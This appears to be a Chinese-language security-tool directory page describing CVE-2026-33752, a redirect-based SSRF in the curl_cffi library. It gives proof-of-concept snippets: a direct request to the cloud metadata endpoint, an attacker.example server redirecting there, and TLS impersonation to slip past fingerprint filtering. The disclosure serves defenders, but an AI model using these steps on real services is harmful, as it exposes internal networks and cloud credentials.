Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33752 — 演示了 curl_cffi 中基于重定向的 SSRF 漏洞,该漏洞允许访问内部网络,并附有 PoC 代码及对 TLS 模拟绕过的分析。 | Kitploit
工具/GitHubGitHub/redyank/cve-2026-33752
漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubredyank/cve-2026-33752

CVE-2026-33752

演示了 curl_cffi 中基于重定向的 SSRF 漏洞,该漏洞允许访问内部网络,并附有 PoC 代码及对 TLS 模拟绕过的分析。

查看仓库
155个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33752

CVE-2026-33752(基于重定向的 SSRF,可导致 curl_cffi 访问内部网络)

摘要

curl_cffi 未限制对内部 IP 范围的请求,并会通过底层 libcurl 自动跟随重定向。

因此,攻击者可控的 URL 可以将请求重定向到云元数据端点等内部服务。此外,curl_cffi 的 TLS 模拟功能可使这些请求看起来像合法的浏览器流量,从而可能绕过某些网络控制。

详情

该问题源于 curl_cffi 处理出站请求的方式

  • 用户提供的 URL 直接传递给 libcurl,未检查其是否解析到内部 IP 范围(例如 127.0.0.1、169.254.0.0/16)。
  • 重定向在 libcurl 内部被自动跟随(CURLOPT_FOLLOWLOCATION = 1)。
  • Python 层未对重定向目标进行任何验证。

这意味着,即使应用程序只允许请求外部 URL,攻击者也可以

  • 提供一个指向攻击者控制服务器的 URL
  • 返回一个指向内部服务的重定向响应
  • 让 curl_cffi 自动跟随该重定向

因此,内部端点(例如云实例元数据 API)可以被访问。

此外,curl_cffi 支持 TLS 指纹模拟(例如 impersonate="chrome")。在根据 TLS 指纹过滤出站请求的环境中,这可能使此类请求更难被检测或阻止。

此行为与之前报告的基于重定向的 SSRF 问题(如 CVE-2025-68616)类似,即重定向允许访问非预期的内部资源。

PoC

  1. 直接请求内部服务
root@kitploit:~
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. 重定向到内部服务 攻击者服务器:
root@kitploit:~
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

受害者代码:

root@kitploit:~
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

结果

  • 初始请求发送到攻击者服务器
  • 返回重定向
  • libcurl 自动跟随重定向
  • 内部元数据端点被访问
  1. 使用 TLS 模拟
root@kitploit:~
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

在某些环境中,这可能有助于请求绕过基于 TLS 的过滤控制。

影响

能够控制请求 URL 的攻击者可能能够:

  • 访问内部网络服务
  • 访问云元数据端点并获取敏感信息
  • 绕过某些出站过滤机制(取决于环境) 这对应于 CWE-918 服务器端请求伪造(Server-Side Request Forgery)。
下载工具